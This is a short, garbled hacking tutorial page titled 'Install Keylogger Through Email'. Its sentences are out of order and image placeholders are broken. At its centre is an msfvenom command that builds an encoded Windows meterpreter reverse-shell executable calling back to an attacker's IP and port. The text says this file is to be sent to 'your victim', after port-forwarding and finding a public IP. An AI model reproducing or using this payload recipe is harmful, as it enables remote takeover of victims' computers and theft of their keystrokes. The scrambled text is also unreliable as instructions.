Install Keylogger Through Email

broken image
broken image

Type: msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1337 -b '\x00' -e x86/shikata_ga_nai -f exe -o thehacktoday.exe

broken image

Mine is: 192.168.1.6 And i will use a port 1337 you can use whatever you want.įor creating a Payload you need to follow these commands. (which will not suggest you to do it.) You need to port-forward and find your public IP Address.

broken image

Which you’re going to send your victim!įor that, You need to find your localhost IP Address in your Attacking on LAN network.